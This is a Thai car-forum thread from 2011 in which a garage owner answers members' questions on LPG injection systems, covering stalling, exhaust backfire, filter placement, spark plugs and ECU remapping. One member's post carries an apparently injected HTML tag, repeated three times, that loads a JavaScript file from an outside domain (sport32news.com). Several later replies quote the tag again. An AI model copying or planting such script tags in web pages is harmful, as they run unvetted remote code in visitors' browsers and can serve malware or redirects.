ตอบ
URC


ชื่อเล่น: เบียร์

เข้าร่วม: 16 มกรา 2011
ตอบ: 28

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 1

ที่อยู่: 125/1 บางสีทอง บางกรวย นนทบุรี
อาทิตย์, 16 มกรา 2011 16:52 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
สวัสดีสมาชิก CivicESgroup ทุกท่าน ผมเบียร์จาก URC garage ยินดีให้คำปรึกษา
และแบ่งปันความรู้ ประสบการณ์ในเรื่องเกี่ยวกับเครื่องยนต์ และ แก๊สระบบหัวฉีด

ซึ่งมีเพื่อสมาชิกที่นี่แนะนำให้ผมเข้ามาช่วยตอบปัญหาที่นี่บ้าง เนื่องจากไปรู้จักผมที่
Civic FD Thailand ที่กระทู้นี้ครับ

http://www.civicfdthailand.com/ipb_forum/index.php?showtopic=31130

ก่อนอื่นต้องขอออกตัวก่อนว่าผมให้คำปรึกษาปัญหาเท่านั้น ไม่รับแก้งานนะครับ
เมื่อได้แนวทางในการแก้ปัญหาแล้วกรุณากลับไปให้ร้านที่คุณติดตั้งมาเพื่อตรวจสอบ
แก้ไขปัญหาต่อไป

และคำตอบที่ผมตอบเป็นแค่แนวทางในการตรวจสอบปัญหาที่แท้จริงเท่านั้น
อาจไม่ถูกต้อง 100% แต่ข้อมูลจากเจ้าของปัญหาที่ชัดเจน
จะช่วยให้การวิเคราะห์ปัญหานั้นๆได้แม่นยำขึ้นครับ

สงสัยสิ่งใดก็ถามกันได้ตามสะดวกครับ
ได้รับคำขอบคุณจาก: benzd 
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 16 มกรา 2011 21:13 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
ขอบคุณครับ ที่เข้ามาช่วยกันแบ่งปันความรู้ให้กับคนใช้แก๊ส
หวังว่ากระทู้นี้คงมีประโยนช์และทำให้คนใช้แก๊สได้มีความรู้และความสุขนะครับ
URC


ชื่อเล่น: เบียร์

เข้าร่วม: 16 มกรา 2011
ตอบ: 28

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 1

ที่อยู่: 125/1 บางสีทอง บางกรวย นนทบุรี
อาทิตย์, 16 มกรา 2011 22:10 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
benzd พิมพ์ว่า:
ขอบคุณครับ ที่เข้ามาช่วยกันแบ่งปันความรู้ให้กับคนใช้แก๊ส
หวังว่ากระทู้นี้คงมีประโยนช์และทำให้คนใช้แก๊สได้มีความรู้และความสุขนะครับ


ยินดีครับ หวังเช่นนั้นเช่นกันครับ รู้เพื่อระวัง รู้เพื่อป้องกัน รู้เพื่อปลอดภัยกับทุกๆท่านครับ
ได้รับคำขอบคุณจาก: benzd 
silverqoo


เข้าร่วม: 08 พฤศจิกา 2009
ตอบ: 323

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 580
ให้คำขอบคุณ: 10
จันทร์, 17 มกรา 2011 22:22 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
คับผม อาการรถผมตอนเปลี่ยนจากน้ำมันเป็นแก๊ส เครื่องจะดับ แล้วเมื่อเหยียบคันเร่ง ย่ำลงไปอีกสักแปบเครื่องก็จะติดขณะที่รถยังไหลอยู่ แล้วก็จะใช้แก๊สได้ปกติครับ อาการจะเป็นตอนที่จอดรถสัก 5-10 นาทีเป็นต้นไปครับ แต่ถ้า ขับอยู่แล้วลองเปลี่ยนจากแก๊สไปเป็นน้ำมันแล้วปล่อยให้ตัดเป็นแก๊สเองจะไม่มีอาการดับ เพียงแค่กระตุก นิดหน่อยครับ

แต่ถ้าจอดไว้นานๆแล้วจะใช้โดยไม่ให้เครื่องดับ ผมต้องรอให้เครื่องได้อุณหภูมิ แล้วก็จอดเร่งเครื่องจนถึงรอบ 2000 จะตัดเป็นแก๊ส เครื่องจะไม่ดับและไม่มีอาการกระตุกเลยครับ

Sec 2 ปลั๊ก หัวฉีดคับ หม้อต้ม OMVL หัวฉีด OMVL(Reg หัวสีน้ำเงินครับ) ใช้แก๊สมาประมาณ7000 กม.หรือประมาณ 6 เดือนครับ
ไม่เคยล้างหม้อต้ม กรองแก๊สยังไม่ได้เปลี่ยน ลิ้นปีกผีเสื้อ ล้างแล้ว หัวเทียนเช็คมายังใช้ได้อยู่ครับ(เปลี่ยนก่อนไปติดแก๊สประมาณ 1000 กม.)
ได้รับคำขอบคุณจาก: benzd 
URC


ชื่อเล่น: เบียร์

เข้าร่วม: 16 มกรา 2011
ตอบ: 28

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 1

ที่อยู่: 125/1 บางสีทอง บางกรวย นนทบุรี
อังคาร, 18 มกรา 2011 08:53 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
silverqoo พิมพ์ว่า:
คับผม อาการรถผมตอนเปลี่ยนจากน้ำมันเป็นแก๊ส เครื่องจะดับ แล้วเมื่อเหยียบคันเร่ง ย่ำลงไปอีกสักแปบเครื่องก็จะติดขณะที่รถยังไหลอยู่ แล้วก็จะใช้แก๊สได้ปกติครับ อาการจะเป็นตอนที่จอดรถสัก 5-10 นาทีเป็นต้นไปครับ แต่ถ้า ขับอยู่แล้วลองเปลี่ยนจากแก๊สไปเป็นน้ำมันแล้วปล่อยให้ตัดเป็นแก๊สเองจะไม่มีอาการดับ เพียงแค่กระตุก นิดหน่อยครับ

แต่ถ้าจอดไว้นานๆแล้วจะใช้โดยไม่ให้เครื่องดับ ผมต้องรอให้เครื่องได้อุณหภูมิ แล้วก็จอดเร่งเครื่องจนถึงรอบ 2000 จะตัดเป็นแก๊ส เครื่องจะไม่ดับและไม่มีอาการกระตุกเลยครับ

Sec 2 ปลั๊ก หัวฉีดคับ หม้อต้ม OMVL หัวฉีด OMVL(Reg หัวสีน้ำเงินครับ) ใช้แก๊สมาประมาณ7000 กม.หรือประมาณ 6 เดือนครับ
ไม่เคยล้างหม้อต้ม กรองแก๊สยังไม่ได้เปลี่ยน ลิ้นปีกผีเสื้อ ล้างแล้ว หัวเทียนเช็คมายังใช้ได้อยู่ครับ(เปลี่ยนก่อนไปติดแก๊สประมาณ 1000 กม.)


ตอนที่กดตัดจากน้ำมันเป็นแก๊ส ถ้าแก๊สยังไม่พร้อมทำงาน หรือ อุณหภูมิหม้อต้มยังไม่ร้อนพอ
ปริมาณแก๊สที่เข้าเครื่องยนต์ก็จะหนาเกินไปก็จะทำให้เกิดอาการนี้ได้
แนะนำให้ระบบแก๊สทำงานอัตโนมัติตามปกติครับ

ส่วนเรื่องตัดเข้าแก๊สกระตุก หรือวูบ ถ้าเป็นมาตั้งแต่ติดตั้งเลยให้ตรวจสอบ
ความถูกต้องของการติดตั้งหัวฉีดแก๊ส การปรับจูนแก๊ส

แต่ถ้าพึ่งจะมาเป็นที่หลัง ให้ตรวจสอบตารางจูน กรองแก๊ส และแก๊สรั่วครับ


แก้ไขล่าสุดโดย เมื่อ อังคาร, 18 มกรา 2011 13:28, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: benzd  cisco  doraemon04 
pop_2008


เข้าร่วม: 17 มกรา 2010
ตอบ: 600

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 582
ให้คำขอบคุณ: 445

ที่อยู่: เพชรบุรี
ปี: 2003
อังคาร, 18 มกรา 2011 10:52 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
กรองแก็ส เราเปลี่ยนเองได้มั้ยครับ
ได้รับคำขอบคุณจาก: benzd 
suwitjim


ชื่อเล่น: วิทย์

เข้าร่วม: 16 ตุลา 2010
ตอบ: 1959

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 893
ให้คำขอบคุณ: 1488

ที่อยู่: กทม. ลาดกระบัง
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 18 มกรา 2011 11:02 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
ขอปรึกษาครับ
รถผมติดแก๊สหัวฉีดของ AC มีอาการ ยกคันเร่งแล้วเกิดอาการ Blackfire

แก้ไขโดย 1. เปลี่ยนหัวเทียน ไม่หาย
2. จูนแก๊ส ไม่หาย

ผมต้องทำอย่างไรบ้างครับ หัวเทียนที่เปลี่ยนไม่ใช่ NGK นะครับ

ถ้าผมเปลี่ยนหัวเทียน NGK แล้วจะต้องจูนใหม่หรือป่าวครับ
ได้รับคำขอบคุณจาก: benzd 
cisco


ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
อังคาร, 18 มกรา 2011 12:03 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
อยากรู้ว่า Blackfire อาการเป็นแบบไหนครับ คุณวิทย์ ผมไม่รู้จิง ๆ






อู่ที่ผมไปติดเคยบอกว่าหัวเทียนให้ใช้ของ 0 ล่ะดีอยู่แล้ว ไม่ควรใช้แบบหัวเข็ม หรือ Iridium

จิงหรือเปล่าครับ สอบถามเพิ่ม
ได้รับคำขอบคุณจาก: suwitjim  benzd 
suwitjim


ชื่อเล่น: วิทย์

เข้าร่วม: 16 ตุลา 2010
ตอบ: 1959

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 893
ให้คำขอบคุณ: 1488

ที่อยู่: กทม. ลาดกระบัง
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 18 มกรา 2011 12:07 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
cisco พิมพ์ว่า:
อยากรู้ว่า Blackfire อาการเป็นแบบไหนครับ คุณวิทย์ ผมไม่รู้จิง ๆ






อู่ที่ผมไปติดเคยบอกว่าหัวเทียนให้ใช้ของ 0 ล่ะดีอยู่แล้ว ไม่ควรใช้แบบหัวเข็ม หรือ Iridium

จิงหรือเปล่าครับ สอบถามเพิ่ม


พี่เต้น ...

Blackfire ท่อมันยิงตอนที่ถอนคันเร่งครับพี่ ...
ได้รับคำขอบคุณจาก: benzd  cisco 
URC


ชื่อเล่น: เบียร์

เข้าร่วม: 16 มกรา 2011
ตอบ: 28

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 1

ที่อยู่: 125/1 บางสีทอง บางกรวย นนทบุรี
อังคาร, 18 มกรา 2011 13:03 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
pop_2008 พิมพ์ว่า:
กรองแก็ส เราเปลี่ยนเองได้มั้ยครับ


ทำได้ครับ ถ้ามีความรู้พื้นฐานช่างเรื่องระบบแก๊ส และ อะไหล่ที่ต้องเปลี่ยน
สิ่งที่ต้องระวังคือเมื่อใส่กลับเข้าไปแล้วต้องไม่รั่วครับ


suwitjim พิมพ์ว่า:
ขอปรึกษาครับ
รถผมติดแก๊สหัวฉีดของ AC มีอาการ ยกคันเร่งแล้วเกิดอาการ Blackfire

แก้ไขโดย 1. เปลี่ยนหัวเทียน ไม่หาย
2. จูนแก๊ส ไม่หาย

ผมต้องทำอย่างไรบ้างครับ หัวเทียนที่เปลี่ยนไม่ใช่ NGK นะครับ
ถ้าผมเปลี่ยนหัวเทียน NGK แล้วจะต้องจูนใหม่หรือป่าวครับ


ปกติแล้วระบบหัวฉีดจะไม่มีอาการระเบิดย้อนกลับในท่อไอดีนะครับ

ไม่ทราบว่าตอนใช้น้ำมันเป็นด้วยหรือไม่ครับ ถ้าใช้น้ำมันก็มีอาการด้วยให้ตรวจเช็ค
ปรับตั้งวาล์วดูก่อน ถ้ายังไม่หายให้วัดกำลังอัดกระบอกสูบดู เพราะถ้า
ตอนติดแก๊สไม่ได้ถอดท่อไอดีออกมาเจาะ เศษที่หล่นลงไปจะทำให้บ่าวาล์วรั่ว
ฝาสูบ กระบอกสูบเสียหาย และมีอาการดังกล่าวได้ เมื่อใช้ไปสักระยะครับ

แต่ถ้าใช้น้ำมันปกติทุกอย่างตรวจสอบระบบแก๊สอย่างเดียวเลยครับ
อาจจะติดตั้งหัวฉีด ระบบสายไฟ หรือ ปรับจูนยังไม่ถูกต้องครับ


cisco พิมพ์ว่า:
อยากรู้ว่า Blackfire อาการเป็นแบบไหนครับ คุณวิทย์ ผมไม่รู้จิง ๆ
อู่ที่ผมไปติดเคยบอกว่าหัวเทียนให้ใช้ของ 0 ล่ะดีอยู่แล้ว ไม่ควรใช้แบบหัวเข็ม หรือ Iridium
จิงหรือเปล่าครับ สอบถามเพิ่ม


หัวเข็มใช้ได้ดีมากกว่า อายุยืนนานกว่า แต่ราคาก็แพงกว่าด้วย
แต่ต้องเทียบเบอร์หัวเทียนให้ตรงเบอร์เดิมด้วยนะครับ
ได้รับคำขอบคุณจาก: benzd  cisco  pop_2008 
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 18 มกรา 2011 13:11 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
แวะมาเก็บคามรู้ดีๆจากพี่เบียร์
ได้รับคำขอบคุณจาก: URC 
suwitjim


ชื่อเล่น: วิทย์

เข้าร่วม: 16 ตุลา 2010
ตอบ: 1959

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 893
ให้คำขอบคุณ: 1488

ที่อยู่: กทม. ลาดกระบัง
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 18 มกรา 2011 13:18 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
ยิงออกทางท่อไอเสียครับพี่ ...

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: benzd 
URC


ชื่อเล่น: เบียร์

เข้าร่วม: 16 มกรา 2011
ตอบ: 28

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 1

ที่อยู่: 125/1 บางสีทอง บางกรวย นนทบุรี
อังคาร, 18 มกรา 2011 13:32 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
suwitjim พิมพ์ว่า:
ยิงออกทางท่อไอเสียครับพี่ ...

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">


ถ้ายิงออกท่อไอเสีย เกิดได้หลายจุดครับ เช่น

-หัวเทียน หรือ ระบบจุดระเบิด ไม่สมบูรณ์
-องศาไฟจุดระเบิด อ่อนไป
-จ่ายเชื้อเพลิงหนาไป
-ท่อไอเสียโล่งไป
-หัวฉีดแก๊สควบคุมแก๊สไม่ได้ เป็นต้นครับ
ได้รับคำขอบคุณจาก: suwitjim  benzd  cisco  doraemon04 
suwitjim


ชื่อเล่น: วิทย์

เข้าร่วม: 16 ตุลา 2010
ตอบ: 1959

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 893
ให้คำขอบคุณ: 1488

ที่อยู่: กทม. ลาดกระบัง
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 18 มกรา 2011 13:54 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
URC พิมพ์ว่า:
suwitjim พิมพ์ว่า:
ยิงออกทางท่อไอเสียครับพี่ ...

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">


ถ้ายิงออกท่อไอเสีย เกิดได้หลายจุดครับ เช่น

-หัวเทียน หรือ ระบบจุดระเบิด ไม่สมบูรณ์ เปลี่ยนหัวเทียนมาแล้ว มีวิธีเช็คบ้างหรือป่าวครับ
-องศาไฟจุดระเบิด อ่อนไป อันนี้ต้องตั้งวาล์วใช่หรือป่าวครับ
-จ่ายเชื้อเพลิงหนาไป จูนแก๊สมาแล้วนะครับ
-ท่อไอเสียโล่งไป น่าจะใช้เพราะเดินท่อมาใหม่ครับ
-หัวฉีดแก๊สควบคุมแก๊สไม่ได้ เป็นต้นครับ


มีวิธีแก้หรือวิธีเช็คบ้างหรือป่าวครับพีี่ [/b]
ได้รับคำขอบคุณจาก: benzd 
URC


ชื่อเล่น: เบียร์

เข้าร่วม: 16 มกรา 2011
ตอบ: 28

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 1

ที่อยู่: 125/1 บางสีทอง บางกรวย นนทบุรี
อังคาร, 18 มกรา 2011 14:28 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
suwitjim พิมพ์ว่า:
URC พิมพ์ว่า:
suwitjim พิมพ์ว่า:
ยิงออกทางท่อไอเสียครับพี่ ...

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">


ถ้ายิงออกท่อไอเสีย เกิดได้หลายจุดครับ เช่น

-หัวเทียน หรือ ระบบจุดระเบิด ไม่สมบูรณ์ เปลี่ยนหัวเทียนมาแล้ว มีวิธีเช็คบ้างหรือป่าวครับ
-องศาไฟจุดระเบิด อ่อนไป อันนี้ต้องตั้งวาล์วใช่หรือป่าวครับ
-จ่ายเชื้อเพลิงหนาไป จูนแก๊สมาแล้วนะครับ
-ท่อไอเสียโล่งไป น่าจะใช้เพราะเดินท่อมาใหม่ครับ
-หัวฉีดแก๊สควบคุมแก๊สไม่ได้ เป็นต้นครับ


มีวิธีแก้หรือวิธีเช็คบ้างหรือป่าวครับพีี่ [/b]


ใช้น้ำมันเป็นไหม ถ้าใช้น้ำมันเป็นด้วย มี 2 แนวทาง

- ทางแรกกลับสู่สามัญ คือ ทำท่อไอเสียกลับเหมือนเดิม

- ทางที่สองคือ Remap ECU ของรถยนต์ใหม่
เพื่อปรับการจัดการของระบบเครื่องยนต์ให้เหมาะกับท่อไอเสียใหม่
แล้ว ค่อยไปจูนแก๊สในลำดับต่อไปครับ


แก้ไขล่าสุดโดย เมื่อ อังคาร, 18 มกรา 2011 20:06, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: benzd  cisco  doraemon04 
pop_2008


เข้าร่วม: 17 มกรา 2010
ตอบ: 600

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 582
ให้คำขอบคุณ: 445

ที่อยู่: เพชรบุรี
ปี: 2003
อังคาร, 18 มกรา 2011 18:10 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
ถามอีกนิดนะครับ
1ถ้าเราไม่ตัดปั๊มติกมีผลมากน้อยแค่ไหนครับ
2ตามรูปตรงกรองแก็สมันติดกับท่อแอร์ เวลาในงานแก็สจะร้อน ท่อแอร์จะเย็น
มันติดกันมีผลมั้ยครับ(ผมเห้นมาคราบดำๆตรงที่มันติดกันด้วย)
***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
ได้รับคำขอบคุณจาก: benzd 
URC


ชื่อเล่น: เบียร์

เข้าร่วม: 16 มกรา 2011
ตอบ: 28

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 1

ที่อยู่: 125/1 บางสีทอง บางกรวย นนทบุรี
อังคาร, 18 มกรา 2011 21:10 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
pop_2008 พิมพ์ว่า:
ถามอีกนิดนะครับ
1ถ้าเราไม่ตัดปั๊มติกมีผลมากน้อยแค่ไหนครับ
2ตามรูปตรงกรองแก็สมันติดกับท่อแอร์ เวลาในงานแก็สจะร้อน ท่อแอร์จะเย็น
มันติดกันมีผลมั้ยครับ(ผมเห้นมาคราบดำๆตรงที่มันติดกันด้วย)
***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ


ตอบครับ

1 รบกวนไปดูตามลิ๊งค์นะครับ มีข้อมูลอื่นๆที่ควรรู้ด้วย จะได้ไม่เปลืองเนื้อที่เว๊ปครับ
http://urc.fix.gs/index.php?board=1.0

2 น่าจะหาที่วางให้ดีกว่านี้นะครับ แบบนี้เกิดการเสียดสี อาจทำให้กรองแก๊สรั่วได้

และ นี่เป็นตัวอย่างการติดตั้งที่ผิดนะครับ เพราะ เซนเซอร์ที่เป็นทองเหลืองนั้น
ต้องอยู่หลังกรองแก๊สนะครับไม่ใช่อยู่ก่อนกรองแก๊ส
ผมเจอร้านที่ติดผิดแบบนี้เยอะมากเลยครับ แก้ไขแล้วจูนแก๊สใหม่เสียนะครับ
ได้รับคำขอบคุณจาก: benzd  pop_2008  cisco  doraemon04 
pop_2008


เข้าร่วม: 17 มกรา 2010
ตอบ: 600

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 582
ให้คำขอบคุณ: 445

ที่อยู่: เพชรบุรี
ปี: 2003
พุธ, 19 มกรา 2011 08:07 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
ขอบคุณมากเลยครับ
ได้รับคำขอบคุณจาก: benzd 
URC


ชื่อเล่น: เบียร์

เข้าร่วม: 16 มกรา 2011
ตอบ: 28

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 1

ที่อยู่: 125/1 บางสีทอง บางกรวย นนทบุรี
พุธ, 19 มกรา 2011 12:30 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
pop_2008 พิมพ์ว่า:
ขอบคุณมากเลยครับ


ยินดีครับ
ได้รับคำขอบคุณจาก: benzd 
pop_2008


เข้าร่วม: 17 มกรา 2010
ตอบ: 600

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 582
ให้คำขอบคุณ: 445

ที่อยู่: เพชรบุรี
ปี: 2003
พุธ, 19 มกรา 2011 13:16 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
และ นี่เป็นตัวอย่างการติดตั้งที่ผิดนะครับ เพราะ เซนเซอร์ที่เป็นทองเหลืองนั้น
ต้องอยู่หลังกรองแก๊สนะครับไม่ใช่อยู่ก่อนกรองแก๊ส


เพราะอะไรครับ มันมีหน้าทีอะไรหรือครับ
ได้รับคำขอบคุณจาก: benzd 
suwitjim


ชื่อเล่น: วิทย์

เข้าร่วม: 16 ตุลา 2010
ตอบ: 1959

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 893
ให้คำขอบคุณ: 1488

ที่อยู่: กทม. ลาดกระบัง
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 19 มกรา 2011 13:21 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
URC พิมพ์ว่า:
suwitjim พิมพ์ว่า:
URC พิมพ์ว่า:
suwitjim พิมพ์ว่า:
ยิงออกทางท่อไอเสียครับพี่ ...

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">


ถ้ายิงออกท่อไอเสีย เกิดได้หลายจุดครับ เช่น

-หัวเทียน หรือ ระบบจุดระเบิด ไม่สมบูรณ์ เปลี่ยนหัวเทียนมาแล้ว มีวิธีเช็คบ้างหรือป่าวครับ
-องศาไฟจุดระเบิด อ่อนไป อันนี้ต้องตั้งวาล์วใช่หรือป่าวครับ
-จ่ายเชื้อเพลิงหนาไป จูนแก๊สมาแล้วนะครับ
-ท่อไอเสียโล่งไป น่าจะใช้เพราะเดินท่อมาใหม่ครับ
-หัวฉีดแก๊สควบคุมแก๊สไม่ได้ เป็นต้นครับ


มีวิธีแก้หรือวิธีเช็คบ้างหรือป่าวครับพีี่ [/b]


ใช้น้ำมันเป็นไหม ถ้าใช้น้ำมันเป็นด้วย มี 2 แนวทาง

- ทางแรกกลับสู่สามัญ คือ ทำท่อไอเสียกลับเหมือนเดิม

- ทางที่สองคือ Remap ECU ของรถยนต์ใหม่
เพื่อปรับการจัดการของระบบเครื่องยนต์ให้เหมาะกับท่อไอเสียใหม่
แล้ว ค่อยไปจูนแก๊สในลำดับต่อไปครับ


ทางที่สองเนี่ยไปบอกร้านทั่วไปได้หรือป่าวครับ หรือว่าต้องร้านเฉพาะอ่ะพี่ ...
URC


ชื่อเล่น: เบียร์

เข้าร่วม: 16 มกรา 2011
ตอบ: 28

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 1

ที่อยู่: 125/1 บางสีทอง บางกรวย นนทบุรี
พุธ, 19 มกรา 2011 14:26 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
suwitjim พิมพ์ว่า:


Remap ECU ของรถยนต์ใหม่เนี่ยไปบอกร้านทั่วไปได้หรือป่าวครับ หรือว่าต้องร้านเฉพาะอ่ะพี่ ...


ร้านที่รับจูนกล่อง ปลดล๊อค กล่องเดิมรถให้แรงขึ้น หรือ จะเป็นพวก
กล่องพ่วง กล่องStand-alone เช่น F-con E-manage Mo-tec ฯลฯ ครับ


pop_2008 พิมพ์ว่า:
และ นี่เป็นตัวอย่างการติดตั้งที่ผิดนะครับ เพราะ เซนเซอร์ที่เป็นทองเหลืองนั้น
ต้องอยู่หลังกรองแก๊สนะครับไม่ใช่อยู่ก่อนกรองแก๊ส

เพราะอะไรครับ มันมีหน้าทีอะไรหรือครับ


ถ้าตอบแบบง่ายๆคือ คู่มือการติดตั้งบอกไว้แบบนั้นครับ

แต่ถ้าตอบแบบทางเทคนิค คือ ตัวทองเหลืองนั้นเป็นตัวส่ง
Pressure Sensor และ Temperature sensor
เพราะฉะนั้น Real Pressure และ Real Temperature
ต้องอยู่หลังกรองแก๊สครับ
ได้รับคำขอบคุณจาก: benzd 
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 19 มกรา 2011 20:26 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
พี่เบียร์ครับ พวก F-con E-manage สำหรับรถใช้แก๊ส มีประโยชน์เหมือนรถใช้น้ำมันไหมครับ
URC


ชื่อเล่น: เบียร์

เข้าร่วม: 16 มกรา 2011
ตอบ: 28

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 1

ที่อยู่: 125/1 บางสีทอง บางกรวย นนทบุรี
พุธ, 19 มกรา 2011 21:22 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
benzd พิมพ์ว่า:
พี่เบียร์ครับ พวก F-con E-manage สำหรับรถใช้แก๊ส มีประโยชน์เหมือนรถใช้น้ำมันไหมครับ


แก๊สกับน้ำมันจริงๆมันก็คือเชื้อเพลิงเหมือนๆกัน หลักๆต่างกันที่ อ๊อกเทนเท่านั้น

ถ้า ECU รถสามารถตอบสนอง อ๊อกเทน105 ของแก๊สได้ แก๊สวิ่งดีกว่าน้ำมันแน่นอน
แต่ในส่วนของฮอนด้า ไม่ได้เผื่อมาให้มากพอ แรงต้นๆ ตอนใช้แก๊สเลยรู้สึกอืดๆหน่อยนึง
เมื่อเทียบกับน้ำมัน แต่ปลายใช้แก๊สไหลดีกว่าใช้น้ำมัน ถ้าติดตั้งปรับจูนแก๊สถูกต้อง

